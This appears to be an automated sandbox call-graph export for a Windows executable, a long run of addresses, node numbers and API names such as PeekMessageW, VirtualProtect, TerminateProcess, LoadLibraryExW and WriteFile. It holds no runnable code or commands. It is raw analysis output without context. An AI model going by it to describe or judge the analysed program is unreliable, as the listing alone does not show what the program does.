104645->104744 104664 8ffce0 104647->104664 104648 92fe92 104650 92fe9a 104648->104650 104651 93089c 104648->104651 104745 95834f 59 API calls Mailbox 104650->104745 104746 959e4a 89 API calls 4 library calls 104651->104746 104654 92feb2 Mailbox 104656 90f950 104655->104656 104657 90f962 104655->104657 104747 8f9d3c 104656->104747 104659 90f991 104657->104659 104660 90f968 104657->104660 104662 8f9d3c 60 API calls 104659->104662 104661 910db6 Mailbox 59 API calls 104660->104661 104663 90f95a 104661->104663 104662->104663 104663->104644 104767 8f8180 104664->104767 104666 8ffd3d 104667 93472d 104666->104667 104727 9006f6 104666->104727 104772 8ff234 104666->104772 104903 959e4a 89 API calls 4 library calls 104667->104903 104671 93488d 104680 8ffe4c 104671->104680 104706 934742 104671->104706 104909 96a2d9 85 API calls Mailbox 104671->104909 104672 8ffe3e 104672->104671 104672->104680 104907 9466ec 59 API calls 2 library calls 104672->104907 104673 900517 104684 910db6 Mailbox 59 API calls 104673->104684 104674 934b53 104674->104706 104928 959e4a 89 API calls 4 library calls 104674->104928 104675 934755 104679 9347d7 104675->104679 104904 8ff6a3 341 API calls 104675->104904 104677 910db6 59 API calls Mailbox 104690 8ffdd3 104677->104690 104679->104706 104905 959e4a 89 API calls 4 library calls 104679->104905 104680->104674 104685 9348f9 104680->104685 104776 8f837c 104680->104776 104681 934848 104908 9460ef 59 API calls 2 library calls 104681->104908 104689 900545 _memmove 104684->104689 104695 934917 104685->104695 104911 8f85c0 104685->104911 104702 910db6 Mailbox 59 API calls 104689->104702 104690->104672 104690->104673 104690->104675 104690->104677 104690->104689 104690->104706 104717 93480c 104690->104717 104873 8f9ea0 104690->104873 104691 8ffea4 104700 934ad6 104691->104700 104701 8fff32 104691->104701 104738 900179 Mailbox _memmove 104691->104738 104692 93486b 104697 8f9ea0 341 API calls 104692->104697 104693 9348b2 Mailbox 104693->104680 104910 9466ec 59 API calls 2 library calls 104693->104910 104696 934928 104695->104696 104699 8f85c0 59 API calls 104695->104699 104696->104738 104919 9460ab 59 API calls Mailbox 104696->104919 104697->104671 104699->104696 104927 959ae7 60 API calls 104700->104927 104704 910db6 Mailbox 59 API calls 104701->104704 104742 900106 _memmove 104702->104742 104709 8fff39 104704->104709 104709->104727 104783 9009d0 104709->104783 104710 934a4d 104711 8f9ea0 341 API calls 104710->104711 104713 934a87 104711->104713 104713->104706 104922 8f84c0 104713->104922 104715 8fffb2 104715->104689 104722 8fffe6 104715->104722 104715->104727 104906 959e4a 89 API calls 4 library calls 104717->104906 104720 934ab2 104926 959e4a 89 API calls 4 library calls 104720->104926 104725 8f8047 59 API calls 104722->104725 104728 900007 104722->104728 104724 8f9d3c 60 API calls 104724->104738 104725->104728 104902 959e4a 89 API calls 4 library calls 104727->104902 104728->104727 104731 934b24 104728->104731 104733 90004c 104728->104733 104729 900398 104729->104654 104730 910db6 59 API calls Mailbox 104730->104738 104732 8f9d3c 60 API calls 104731->104732 104732->104674 104733->104674 104733->104727 104734 9000d8 104733->104734 104735 8f9d3c 60 API calls 104734->104735 104737 9000eb 104735->104737 104736 934a1c 104739 910db6 Mailbox 59 API calls 104736->104739 104737->104727 104860 8f82df 104737->104860 104738->104710 104738->104720 104738->104724 104738->104727 104738->104729 104738->104730 104738->104736 104871 8f8740 68 API calls __cinit 104738->104871 104872 8f8660 68 API calls 104738->104872 104920 955937 68 API calls 104738->104920 104921 8f89b3 69 API calls Mailbox 104738->104921 104739->104710 104742->104738 104743 900162 104742->104743 104897 8f9c90 104742->104897 104743->104654 104744->104648 104745->104654 104746->104654 104748 8f9d4a 104747->104748 104758 8f9d78 Mailbox 104747->104758 104749 8f9d9d 104748->104749 104755 8f9d50 Mailbox 104748->104755 104760 8f8047 104749->104760 104750 8f9d64 104752 8f9d6f 104750->104752 104753 8f9dcc 104750->104753 104750->104758 104757 92f9e6 VariantClear 104752->104757 104752->104758 104753->104758 104764 8f8cd4 59 API calls Mailbox 104753->104764 104754 92fa0f 104754->104758 104765 946e8f 59 API calls 104754->104765 104755->104750 104755->104754 104757->104758 104758->104663 104761 8f805a 104760->104761 104762 8f8052 104760->104762 104761->104758 104766 8f7f77 59 API calls 2 library calls 104762->104766 104764->104758 104765->104758 104766->104761 104768 8f818f 104767->104768 104771 8f81aa 104767->104771 104769 8f7e4f 59 API calls 104768->104769 104770 8f8197 CharUpperBuffW 104769->104770 104770->104771 104771->104666 104773 8ff251 104772->104773 104774 8ff272 104773->104774 104929 959e4a 89 API calls 4 library calls 104773->104929 104774->104690 104777 8f838d 104776->104777 104778 92edbd 104776->104778 104779 910db6 Mailbox 59 API calls 104777->104779 104781 8f8394 104779->104781 104780 8f83b5 104780->104685 104780->104691 104781->104780 104930 8f8634 59 API calls Mailbox 104781->104930 104784 934cc3 104783->104784 104798 9009f5 104783->104798 104991 959e4a 89 API calls 4 library calls 104784->104991 104786 900cfa 104786->104715 104788 900ee4 104788->104786 104790 900ef1 104788->104790 104989 901093 341 API calls Mailbox 104790->104989 104791 900a4b PeekMessageW 104859 900a05 Mailbox 104791->104859 104793 900ef8 LockWindowUpdate DestroyWindow GetMessageW 104793->104786 104796 900f2a 104793->104796 104795 934e81 Sleep 104795->104859 104799 935c58 TranslateMessage DispatchMessageW GetMessageW 104796->104799 104797 900ce4 104797->104786 104988 901070 10 API calls Mailbox 104797->104988 104798->104859 104992 8f9e5d 60 API calls 104798->104992 104993 946349 341 API calls 104798->104993 104799->104799 104801 935c88 104799->104801 104801->104786 104802 900e43 PeekMessageW 104802->104859 104803 900ea5 TranslateMessage DispatchMessageW 104803->104802 104804 934d50 TranslateAcceleratorW 104804->104802 104804->104859 104805 900d13 timeGetTime 104805->104859 104806 93581f WaitForSingleObject 104808 93583c GetExitCodeProcess CloseHandle 104806->104808 104806->104859 104843 900f95 104808->104843 104809 900e5f Sleep 104845 900e70 Mailbox 104809->104845 104810 8f8047 59 API calls 104810->104859 104811 8f7667 59 API calls 104811->104845 104812 910db6 59 API calls Mailbox 104812->104859 104813 935af8 Sleep 104813->104845 104816 91049f timeGetTime 104816->104845 104817 900f4e timeGetTime 104990 8f9e5d 60 API calls 104817->104990 104821 935b8f GetExitCodeProcess 104827 935ba5 WaitForSingleObject 104821->104827 104828 935bbb CloseHandle 104821->104828 104823 8fb73c 314 API calls 104823->104859 104825 975f25 110 API calls 104825->104845 104826 8fb7dd 109 API calls 104826->104845 104827->104828 104827->104859 104828->104845 104829 935874 104829->104843 104830 935c17 Sleep 104830->104859 104831 935078 Sleep 104831->104859 104833 8f7de1 59 API calls 104833->104845 104836 8f9e5d 60 API calls 104836->104859 104839 8f9ea0 314 API calls 104839->104859 104840 8ffce0 314 API calls 104840->104859 104843->104715 104845->104811 104845->104816 104845->104821 104845->104825 104845->104826 104845->104829 104845->104830 104845->104831 104845->104833 104845->104843 104845->104859 105017 952408 60 API calls 104845->105017 105018 8f9e5d 60 API calls 104845->105018 105019 8f89b3 69 API calls Mailbox 104845->105019 105020 8fb73c 341 API calls 104845->105020 105021 9464da 60 API calls 104845->105021 105022 955244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104845->105022 105023 953c55 66 API calls Mailbox 104845->105023 104846 959e4a 89 API calls 104846->104859 104848 8f9c90 59 API calls Mailbox 104848->104859 104849 8f84c0 69 API calls 104849->104859 104850 8f82df 59 API calls 104850->104859 104851 94617e 59 API calls Mailbox 104851->104859 104852 9355d5 VariantClear 104852->104859 104853 8f8cd4 59 API calls Mailbox 104853->104859 104854 93566b VariantClear 104854->104859 104855 935419 VariantClear 104855->104859 104856 946e8f 59 API calls 104856->104859 104857 8f7de1 59 API calls 104857->104859 104858 8f89b3 69 API calls 104858->104859 104859->104791 104859->104795 104859->104797 104859->104802 104859->104803 104859->104804 104859->104805 104859->104806 104859->104809 104859->104810 104859->104812 104859->104813 104859->104817 104859->104823 104859->104836 104859->104839 104859->104840 104859->104843 104859->104845 104859->104846 104859->104848 104859->104849 104859->104850 104859->104851 104859->104852 104859->104853 104859->104854 104859->104855 104859->104856 104859->104857 104859->104858 104931 8fe6a0 104859->104931 104962 8ff460 104859->104962 104982 8f31ce 104859->104982 104987 8fe420 341 API calls 104859->104987 104994 976018 59 API calls 104859->104994 104995 959a15 59 API calls Mailbox 104859->104995 104996 94d4f2 59 API calls 104859->104996 104997 8f9837 104859->104997 105015 9460ef 59 API calls 2 library calls 104859->105015 105016 8f8401 59 API calls 104859->105016 104861 92eda1 104860->104861 104864 8f82f2 104860->104864 104862 92edb1 104861->104862 106045 9461a4 59 API calls 104861->106045 104865 8f831c 104864->104865 104866 8f85c0 59 API calls 104864->104866 104870 8f8339 Mailbox 104864->104870 104867 8f8322 104865->104867 104868 8f85c0 59 API calls 104865->104868 104866->104865 104869 8f9c90 Mailbox 59 API calls 104867->104869 104867->104870 104868->104867 104869->104870 104870->104742 104871->104738 104872->104738 104874 8f9ebf 104873->104874 104892 8f9eed Mailbox 104873->104892 104875 910db6 Mailbox 59 API calls 104874->104875 104875->104892 104876 8fb475 104877 8f8047 59 API calls 104876->104877 104886 8fa057 104877->104886 104878 8fb47a 104879 9309e5 104878->104879 104880 930055 104878->104880 106051 959e4a 89 API calls 4 library calls 104879->106051 106048 959e4a 89 API calls 4 library calls 104880->106048 104882 910db6 59 API calls Mailbox 104882->104892 104885 8f8047 59 API calls 104885->104892 104886->104690 104887 912d40 67 API calls __cinit 104887->104892 104888 930064 104888->104690 104891 8f7667 59 API calls 104891->104892 104892->104876 104892->104878 104892->104880 104892->104882 104892->104885 104892->104886 104892->104887 104892->104891 104893 946e8f 59 API calls 104892->104893 104894 9309d6 104892->104894 104896 8fa55a 104892->104896 106046 8fc8c0 341 API calls 2 library calls 104892->106046 106047 8fb900 60 API calls Mailbox 104892->106047 104893->104892 106050 959e4a 89 API calls 4 library calls 104894->106050 106049 959e4a 89 API calls 4 library calls 104896->106049 104899 8f9c9b 104897->104899 104898 8f9cd2 104898->104742 104899->104898 106052 8f8cd4 59 API calls Mailbox 104899->106052 104901 8f9cfd 104901->104742 104902->104667 104903->104706 104904->104679 104905->104706 104906->104706 104907->104681 104908->104692 104909->104693 104910->104693 104912 8f85ce 104911->104912 104917 8f85f6 104911->104917 104913 8f85dc 104912->104913 104915 8f85c0 59 API calls 104912->104915 104914 8f85e2 104913->104914 104916 8f85c0 59 API calls 104913->104916 104914->104917 104918 8f9c90 Mailbox 59 API calls 104914->104918 104915->104913 104916->104914 104917->104695 104918->104917 104919->104738 104920->104738 104921->104738 104923 8f84cb 104922->104923 104924 8f84f2 104923->104924 106053 8f89b3 69 API calls Mailbox 104923->106053 104924->104720 104926->104706 104927->104722 104928->104706 104929->104774 104930->104780 104932 8fe6d5 104931->104932 104933 933aa9 104932->104933 104936 8fe73f 104932->104936 104945 8fe799 104932->104945 104934 8f9ea0 341 API calls 104933->104934 104935 933abe 104934->104935 104961 8fe970 Mailbox 104935->104961 105025 959e4a 89 API calls 4 library calls 104935->105025 104939 8f7667 59 API calls 104936->104939 104936->104945 104937 8f7667 59 API calls 104937->104945 104940 933b04 104939->104940 104943 912d40 __cinit 67 API calls 104940->104943 104941 912d40 __cinit 67 API calls 104941->104945 104942 933b26 104942->104859 104943->104945 104944 8f84c0 69 API calls 104944->104961 104945->104937 104945->104941 104945->104942 104946 8fe95a 104945->104946 104945->104961 104946->104961 105026 959e4a 89 API calls 4 library calls 104946->105026 104948 8f9c90 Mailbox 59 API calls 104948->104961 104950 8f9ea0 341 API calls 104950->104961 104952 8f8d40 59 API calls 104952->104961 104957 933e25 104957->104859 104958 959e4a 89 API calls 104958->104961 104959 8ff195 105030 959e4a 89 API calls 4 library calls 104959->105030 104960 8fea78 104960->104859 104961->104944 104961->104948 104961->104950 104961->104952 104961->104958 104961->104959 104961->104960 105024 8f7f77 59 API calls 2 library calls 104961->105024 105027 946e8f 59 API calls 104961->105027 105028 96c5c3 341 API calls 104961->105028 105029 96b53c 341 API calls Mailbox 104961->105029 105031 9693c6 341 API calls Mailbox 104961->105031 104963 8ff4ba 104962->104963 104964 8ff650 104962->104964 104965 8ff4c6 104963->104965 104966 93441e 104963->104966 104967 8f7de1 59 API calls 104964->104967 105133 8ff290 341 API calls 2 library calls 104965->105133 105134 96bc6b 341 API calls Mailbox 104966->105134 104973 8ff58c Mailbox 104967->104973 104970 93442c 104974 8ff630 104970->104974 105135 959e4a 89 API calls 4 library calls 104970->105135 104972 8ff4fd 104972->104970 104972->104973 104972->104974 105032 96df37 104973->105032 105035 8f4e4a 104973->105035 105041 95cb7a 104973->105041 105121 96445a 104973->105121 105130 953c37 104973->105130 104974->104859 104975 8f9c90 Mailbox 59 API calls 104976 8ff5e3 104975->104976 104976->104974 104976->104975 104983 8f3212 104982->104983 104984 8f31e0 104982->104984 104983->104859 104984->104983 104985 8f3205 IsDialogMessageW 104984->104985 104986 92cf32 GetClassLongW 104984->104986 104985->104983 104985->104984 104986->104984 104986->104985 104987->104859 104988->104788 104989->104793 104990->104859 104991->104798 104992->104798 104993->104798 104994->104859 104995->104859 104996->104859 104998 8f9851 104997->104998 105007 8f984b 104997->105007 104999 92f5d3 __i64tow 104998->104999 105000 8f9899 104998->105000 105004 8f9857 __itow 104998->105004 105006 92f4da 104998->105006 106043 913698 83 API calls 3 library calls 105000->106043 105003 910db6 Mailbox 59 API calls 105005 8f9871 105003->105005 105004->105003 105005->105007 105009 8f7de1 59 API calls 105005->105009 105008 910db6 Mailbox 59 API calls 105006->105008 105013 92f552 Mailbox _wcscpy 105006->105013 105007->104859 105010 92f51f 105008->105010 105009->105007 105011 910db6 Mailbox 59 API calls 105010->105011 105012 92f545 105011->105012 105012->105013 105014 8f7de1 59 API calls 105012->105014 106044 913698 83 API calls 3 library calls 105013->106044 105014->105013 105015->104859 105016->104859 105017->104845 105018->104845 105019->104845 105020->104845 105021->104845 105022->104845 105023->104845 105024->104961 105025->104961 105026->104961 105027->104961 105028->104961 105029->104961 105030->104957 105031->104961 105136 96cadd 105032->105136 105034 96df47 105034->104976 105036 8f4e5b 105035->105036 105037 8f4e54 105035->105037 105039 8f4e7b FreeLibrary 105036->105039 105040 8f4e6a 105036->105040 105261 9153a6 105037->105261 105039->105040 105040->104976 105042 8f7667 59 API calls 105041->105042 105043 95cbaf 105042->105043 105044 8f7667 59 API calls 105043->105044 105045 95cbb8 105044->105045 105046 95cbcc 105045->105046 105727 8f9b3c 59 API calls 105045->105727 105048 8f9837 84 API calls 105046->105048 105049 95cbe9 105048->105049 105050 95cc0b 105049->105050 105051 95ccea 105049->105051 105056 95cd1a Mailbox 105049->105056 105052 8f9837 84 API calls 105050->105052 105531 8f4ddd 105051->105531 105054 95cc17 105052->105054 105057 8f8047 59 API calls 105054->105057 105056->104976 105060 95cc23 105057->105060 105058 95cd16 105058->105056 105059 8f7667 59 API calls 105058->105059 105062 95cd4b 105059->105062 105065 95cc37 105060->105065 105066 95cc69 105060->105066 105061 8f4ddd 136 API calls 105061->105058 105063 8f7667 59 API calls 105062->105063 105064 95cd54 105063->105064 105068 8f7667 59 API calls 105064->105068 105069 8f8047 59 API calls 105065->105069 105067 8f9837 84 API calls 105066->105067 105070 95cc76 105067->105070 105071 95cd5d 105068->105071 105072 95cc47 105069->105072 105073 8f8047 59 API calls 105070->105073 105074 8f7667 59 API calls 105071->105074 105075 8f7cab 59 API calls 105072->105075 105076 95cc82 105073->105076 105077 95cd66 105074->105077 105078 95cc51 105075->105078 105728 954a31 GetFileAttributesW 105076->105728 105080 8f9837 84 API calls 105077->105080 105081 8f9837 84 API calls 105078->105081 105083 95cd73 105080->105083 105084 95cc5d 105081->105084 105082 95cc8b 105086 95cc9e 105082->105086 105088 8f79f2 59 API calls 105082->105088 105555 8f459b 105083->105555 105085 8f7b2e 59 API calls 105084->105085 105085->105066 105090 8f9837 84 API calls 105086->105090 105095 95cca4 105086->105095 105088->105086 105089 95cd8e 105606 8f79f2 105089->105606 105091 95cccb 105090->105091 105729 9537ef 75 API calls Mailbox 105091->105729 105095->105056 105096 95cdd1 105097 8f8047 59 API calls 105096->105097 105100 95cddf 105097->105100 105098 8f79f2 59 API calls 105099 95cdae 105098->105099 105099->105096 105102 8f7bcc 59 API calls 105099->105102 105609 8f7b2e 105100->105609 105104 95cdc3 105102->105104 105106 8f7bcc 59 API calls 105104->105106 105105 8f7b2e 59 API calls 105107 95cdfb 105105->105107 105106->105096 105108 8f7b2e 59 API calls 105107->105108 105109 95ce09 105108->105109 105110 8f9837 84 API calls 105109->105110 105111 95ce15 105110->105111 105618 954071 105111->105618 105113 95ce26 105114 953c37 3 API calls 105113->105114 105115 95ce30 105114->105115 105116 8f9837 84 API calls 105115->105116 105120 95ce61 105115->105120 105117 95ce4e 105116->105117 105672 959155 105117->105672 105119 8f4e4a 84 API calls 105119->105056 105120->105119 105122 8f9837 84 API calls 105121->105122 105123 964494 105122->105123 105994 8f6240 105123->105994 105125 9644a4 105126 9644c9 105125->105126 105127 8f9ea0 341 API calls 105125->105127 105129 9644cd 105126->105129 106019 8f9a98 59 API calls Mailbox 105126->106019 105127->105126 105129->104976 106039 95445a GetFileAttributesW 105130->106039 105133->104972 105134->104970 105135->104974 105137 8f9837 84 API calls 105136->105137 105138 96cb1a 105137->105138 105157 96cb61 Mailbox 105138->105157 105174 96d7a5 105138->105174 105140 96cdb9 105141 96cf2e 105140->105141 105145 96cdc7 105140->105145 105223 96d8c8 92 API calls Mailbox 105141->105223 105144 96cf3d 105144->105145 105147 96cf49 105144->105147 105187 96c96e 105145->105187 105146 8f9837 84 API calls 105162 96cbb2 Mailbox 105146->105162 105147->105157 105152 96ce00 105202 910c08 105152->105202 105155 96ce33 105209 8f92ce 105155->105209 105156 96ce1a 105208 959e4a 89 API calls 4 library calls 105156->105208 105157->105034 105160 96ce25 GetCurrentProcess TerminateProcess 105160->105155 105162->105140 105162->105146 105162->105157 105206 96fbce 59 API calls 2 library calls 105162->105206 105207 96cfdf 61 API calls 2 library calls 105162->105207 105166 96cfa4 105166->105157 105170 96cfb8 FreeLibrary 105166->105170 105167 96ce6b 105221 96d649 107 API calls _free 105167->105221 105170->105157 105172 8f9d3c 60 API calls 105173 96ce7c 105172->105173 105173->105166 105173->105172 105222 8f8d40 59 API calls Mailbox 105173->105222 105224 96d649 107 API calls _free 105173->105224 105175 8f7e4f 59 API calls 105174->105175 105176 96d7c0 CharLowerBuffW 105175->105176 105225 94f167 105176->105225 105180 8f7667 59 API calls 105181 96d7f9 105180->105181 105232 8f784b 105181->105232 105183 96d810 105184 8f7d2c 59 API calls 105183->105184 105185 96d81c Mailbox 105184->105185 105186 96d858 Mailbox 105185->105186 105245 96cfdf 61 API calls 2 library calls 105185->105245 105186->105162 105188 96c9de 105187->105188 105189 96c989 105187->105189 105193 96da50 105188->105193 105190 910db6 Mailbox 59 API calls 105189->105190 105192 96c9ab 105190->105192 105191 910db6 Mailbox 59 API calls 105191->105192 105192->105188 105192->105191 105194 96dc79 Mailbox 105193->105194 105201 96da73 _strcat _wcscpy __wsetenvp 105193->105201 105194->105152 105195 8f9be6 59 API calls 105195->105201 105196 8f9b3c 59 API calls 105196->105201 105197 8f9b98 59 API calls 105197->105201 105198 8f9837 84 API calls 105198->105201 105199 91571c 58 API calls std::exception::_Copy_str 105199->105201 105201->105194 105201->105195 105201->105196 105201->105197 105201->105198 105201->105199 105249 955887 61 API calls 2 library calls 105201->105249 105204 910c1d 105202->105204 105203 910cb5 VirtualProtect 105205 910c83 105203->105205 105204->105203 105204->105205 105205->105155 105205->105156 105206->105162 105207->105162 105208->105160 105210 8f92d6 105209->105210 105211 910db6 Mailbox 59 API calls 105210->105211 105212 8f92e4 105211->105212 105213 8f92f0 105212->105213 105250 8f91fc 105212->105250 105215 8f9050 105213->105215 105253 8f9160 105215->105253 105217 8f905f 105218 910db6 Mailbox 59 API calls 105217->105218 105219 8f90fb 105217->105219 105218->105219 105219->105173 105220 8f8d40 59 API calls Mailbox 105219->105220 105220->105167 105221->105173 105222->105173 105223->105144 105224->105173 105226 94f192 __wsetenvp 105225->105226 105227 94f1d1 105226->105227 105230 94f1c7 105226->105230 105231 94f278 105226->105231 105227->105180 105227->105185 105230->105227 105246 8f78c4 61 API calls 105230->105246 105231->105227 105247 8f78c4 61 API calls 105231->105247 105233 8f785a 105232->105233 105234 8f78b7 105232->105234 105233->105234 105236 8f7865 105233->105236 105235 8f7d2c 59 API calls 105234->105235 105242 8f7888 _memmove 105235->105242 105237 92eb09 105236->105237 105238 8f7880 105236->105238 105240 8f8029 59 API calls 105237->105240 105248 8f7f27 59 API calls Mailbox 105238->105248 105241 92eb13 105240->105241 105243 910db6 Mailbox 59 API calls 105241->105243 105242->105183 105244 92eb33 105243->105244 105245->105186 105246->105230 105247->105231 105248->105242 105249->105201 105251 910db6 Mailbox 59 API calls 105250->105251 105252 8f9209 105251->105252 105252->105213 105254 8f9169 Mailbox 105253->105254 105255 92f19f 105254->105255 105260 8f9173 105254->105260 105256 910db6 Mailbox 59 API calls 105255->105256 105257 92f1ab 105256->105257 105258 8f917a 105258->105217 105259 8f9c90 Mailbox 59 API calls 105259->105260 105260->105258 105260->105259 105262 9153b2 __setmode 105261->105262 105263 9153c6 105262->105263 105264 9153de 105262->105264 105296 918b28 58 API calls __getptd_noexit 105263->105296 105271 9153d6 __setmode 105264->105271 105274 916c11 105264->105274 105266 9153cb 105297 918db6 9 API calls __setmode 105266->105297 105271->105036 105275 916c21 105274->105275 105276 916c43 EnterCriticalSection 105274->105276 105275->105276 105277 916c29 105275->105277 105278 9153f0 105276->105278 105279 919c0b __lock 58 API calls 105277->105279 105280 91533a 105278->105280 105279->105278 105281 915349 105280->105281 105282 91535d 105280->105282 105342 918b28 58 API calls __getptd_noexit 105281->105342 105288 915359 105282->105288 105299 914a3d 105282->105299 105284 91534e 105343 918db6 9 API calls __setmode 105284->105343 105298 915415 LeaveCriticalSection LeaveCriticalSection _fseek 105288->105298 105292 915377 105316 920a02 105292->105316 105294 91537d 105294->105288 105295 912d55 _free 58 API calls 105294->105295 105295->105288 105296->105266 105297->105271 105298->105271 105300 914a50 105299->105300 105304 914a74 105299->105304 105301 9146e6 __output_l 58 API calls 105300->105301 105300->105304 105302 914a6d 105301->105302 105344 91d886 105302->105344 105305 920b77 105304->105305 105306 915371 105305->105306 105307 920b84 105305->105307 105309 9146e6 105306->105309 105307->105306 105308 912d55 _free 58 API calls 105307->105308 105308->105306 105310 9146f0 105309->105310 105311 914705 105309->105311 105486 918b28 58 API calls __getptd_noexit 105310->105486 105311->105292 105313 9146f5 105487 918db6 9 API calls __setmode 105313->105487 105315 914700 105315->105292 105317 920a0e __setmode 105316->105317 105318 920a32 105317->105318 105319 920a1b 105317->105319 105320 920abd 105318->105320 105322 920a42 105318->105322 105503 918af4 58 API calls __getptd_noexit 105319->105503 105508 918af4 58 API calls __getptd_noexit 105320->105508 105326 920a60 105322->105326 105327 920a6a 105322->105327 105324 920a20 105504 918b28 58 API calls __getptd_noexit 105324->105504 105505 918af4 58 API calls __getptd_noexit 105326->105505 105330 91d206 ___lock_fhandle 59 API calls 105327->105330 105328 920a65 105509 918b28 58 API calls __getptd_noexit 105328->105509 105332 920a70 105330->105332 105334 920a83 105332->105334 105335 920a8e 105332->105335 105333 920ac9 105510 918db6 9 API calls __setmode 105333->105510 105488 920add 105334->105488 105506 918b28 58 API calls __getptd_noexit 105335->105506 105338 920a27 __setmode 105338->105294 105340 920a89 105507 920ab5 LeaveCriticalSection __unlock_fhandle 105340->105507 105342->105284 105343->105288 105345 91d892 __setmode 105344->105345 105346 91d8b6 105345->105346 105347 91d89f 105345->105347 105348 91d955 105346->105348 105350 91d8ca 105346->105350 105445 918af4 58 API calls __getptd_noexit 105347->105445 105451 918af4 58 API calls __getptd_noexit 105348->105451 105353 91d8f2 105350->105353 105354 91d8e8 105350->105354 105352 91d8a4 105446 918b28 58 API calls __getptd_noexit 105352->105446 105372 91d206 105353->105372 105447 918af4 58 API calls __getptd_noexit 105354->105447 105355 91d8ed 105452 918b28 58 API calls __getptd_noexit 105355->105452 105359 91d8f8 105361 91d90b 105359->105361 105362 91d91e 105359->105362 105381 91d975 105361->105381 105448 918b28 58 API calls __getptd_noexit 105362->105448 105363 91d961 105453 918db6 9 API calls __setmode 105363->105453 105367 91d8ab __setmode 105367->105304 105368 91d917 105450 91d94d LeaveCriticalSection __unlock_fhandle 105368->105450 105369 91d923 105449 918af4 58 API calls __getptd_noexit 105369->105449 105373 91d212 __setmode 105372->105373 105374 91d261 EnterCriticalSection 105373->105374 105375 919c0b __lock 58 API calls 105373->105375 105376 91d287 __setmode 105374->105376 105377 91d237 105375->105377 105376->105359 105378 91d24f 105377->105378 105454 919e2b InitializeCriticalSectionAndSpinCount 105377->105454 105455 91d28b LeaveCriticalSection _doexit 105378->105455 105382 91d982 __write_nolock 105381->105382 105383 91d9c1 105382->105383 105384 91d9e0 105382->105384 105413 91d9b6 105382->105413 105465 918af4 58 API calls __getptd_noexit 105383->105465 105387 91da38 105384->105387 105388 91da1c 105384->105388 105392 91da51 105387->105392 105471 9218c1 60 API calls 3 library calls 105387->105471 105468 918af4 58 API calls __getptd_noexit 105388->105468 105389 91e1d6 105389->105368 105390 91d9c6 105466 918b28 58 API calls __getptd_noexit 105390->105466 105456 925c6b 105392->105456 105394 91da21 105469 918b28 58 API calls __getptd_noexit 105394->105469 105396 91d9cd 105467 918db6 9 API calls __setmode 105396->105467 105400 91da5f 105401 91ddb8 105400->105401 105472 9199ac 58 API calls 2 library calls 105400->105472 105403 91ddd6 105401->105403 105404 91e14b WriteFile 105401->105404 105402 91da28 105470 918db6 9 API calls __setmode 105402->105470 105407 91defa 105403->105407 105415 91ddec 105403->105415 105408 91ddab GetLastError 105404->105408 105412 91dd78 105404->105412 105419 91dfef 105407->105419 105421 91df05 105407->105421 105408->105412 105409 91da8b GetConsoleMode 105409->105401 105411 91daca 105409->105411 105410 91e184 105410->105413 105477 918b28 58 API calls __getptd_noexit 105410->105477 105411->105401 105414 91dada GetConsoleCP 105411->105414 105412->105410 105412->105413 105418 91ded8 105412->105418 105479 91c5f6 105413->105479 105414->105410 105442 91db09 105414->105442 105415->105410 105416 91de5b WriteFile 105415->105416 105416->105408 105420 91de98 105416->105420 105423 91dee3 105418->105423 105424 91e17b 105418->105424 105419->105410 105425 91e064 WideCharToMultiByte 105419->105425 105420->105415 105426 91debc 105420->105426 105421->105410 105427 91df6a WriteFile 105421->105427 105422 91e1b2 105478 918af4 58 API calls __getptd_noexit 105422->105478 105474 918b28 58 API calls __getptd_noexit 105423->105474 105476 918b07 58 API calls 3 library calls 105424->105476 105425->105408 105437 91e0ab 105425->105437 105426->105412 105427->105408 105429 91dfb9 105427->105429 105429->105412 105429->105421 105429->105426 105432 91dee8 105475 918af4 58 API calls __getptd_noexit 105432->105475 105433 91e0b3 WriteFile 105436 91e106 GetLastError 105433->105436 105433->105437 105436->105437 105437->105412 105437->105419 105437->105426 105437->105433 105438 927a5e WriteConsoleW CreateFileW __putwch_nolock 105443 91dc5f 105438->105443 105439 9262ba 60 API calls __write_nolock 105439->105442 105440 91dbf2 WideCharToMultiByte 105440->105412 105441 91dc2d WriteFile 105440->105441 105441->105408 105441->105443 105442->105412 105442->105439 105442->105440 105442->105443 105473 9135f5 58 API calls __isleadbyte_l 105442->105473 105443->105408 105443->105412 105443->105438 105443->105442 105444 91dc87 WriteFile 105443->105444 105444->105408 105444->105443 105445->105352 105446->105367 105447->105355 105448->105369 105449->105368 105450->105367 105451->105355 105452->105363 105453->105367 105454->105378 105455->105374 105457 925c83 105456->105457 105458 925c76 105456->105458 105461 925c8f 105457->105461 105462 918b28 __setmode 58 API calls 105457->105462 105459 918b28 __setmode 58 API calls 105458->105459 105460 925c7b 105459->105460 105460->105400 105461->105400 105463 925cb0 105462->105463 105464 918db6 __setmode 9 API calls 105463->105464 105464->105460 105465->105390 105466->105396 105467->105413 105468->105394 105469->105402 105470->105413 105471->105392 105472->105409 105473->105442 105474->105432 105475->105413 105476->105413 105477->105422 105478->105413 105480 91c600 IsProcessorFeaturePresent 105479->105480 105481 91c5fe 105479->105481 105483 92590a 105480->105483 105481->105389 105484 9258b9 ___raise_securityfailure 5 API calls 105483->105484 105485 9259ed 105484->105485 105485->105389 105486->105313 105487->105315 105511 91d4c3 105488->105511 105490 920b41 105524 91d43d 59 API calls 2 library calls 105490->105524 105492 920aeb 105492->105490 105493 91d4c3 __lseek_nolock 58 API calls 105492->105493 105502 920b1f 105492->105502 105497 920b16 105493->105497 105494 91d4c3 __lseek_nolock 58 API calls 105498 920b2b CloseHandle 105494->105498 105495 920b6b 105495->105340 105496 920b49 105496->105495 105525 918b07 58 API calls 3 library calls 105496->105525 105501 91d4c3 __lseek_nolock 58 API calls 105497->105501 105498->105490 105499 920b37 GetLastError 105498->105499 105499->105490 105501->105502 105502->105490 105502->105494 105503->105324 105504->105338 105505->105328 105506->105340 105507->105338 105508->105328 105509->105333 105510->105338 105512 91d4ce 105511->105512 105514 91d4e3 105511->105514 105526 918af4 58 API calls __getptd_noexit 105512->105526 105518 91d508 105514->105518 105528 918af4 58 API calls __getptd_noexit 105514->105528 105515 91d4d3 105527 918b28 58 API calls __getptd_noexit 105515->105527 105518->105492 105519 91d512 105529 918b28 58 API calls __getptd_noexit 105519->105529 105520 91d4db 105520->105492 105522 91d51a 105530 918db6 9 API calls __setmode 105522->105530 105524->105496 105525->105495 105526->105515 105527->105520 105528->105519 105529->105522 105530->105520 105730 8f4bb5 105531->105730 105536 92d8e6 105539 8f4e4a 84 API calls 105536->105539 105537 8f4e08 LoadLibraryExW 105740 8f4b6a 105537->105740 105541 92d8ed 105539->105541 105543 8f4b6a 3 API calls 105541->105543 105545 92d8f5 